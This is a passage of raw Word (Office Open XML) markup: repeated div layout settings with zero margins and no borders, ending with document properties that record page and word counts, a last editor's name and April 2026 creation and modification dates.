        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1477645082">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1578439638">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1580098178">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1613315296">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1686010702">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1746995534">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="12635391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67195240">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1773431748">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1956905265">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1991060345">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="20959766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17</Pages>
  <Words>2911</Words>
  <Characters>16593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NAIF FAHHAD ALHAMMAD</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-29T19:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-30T08:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>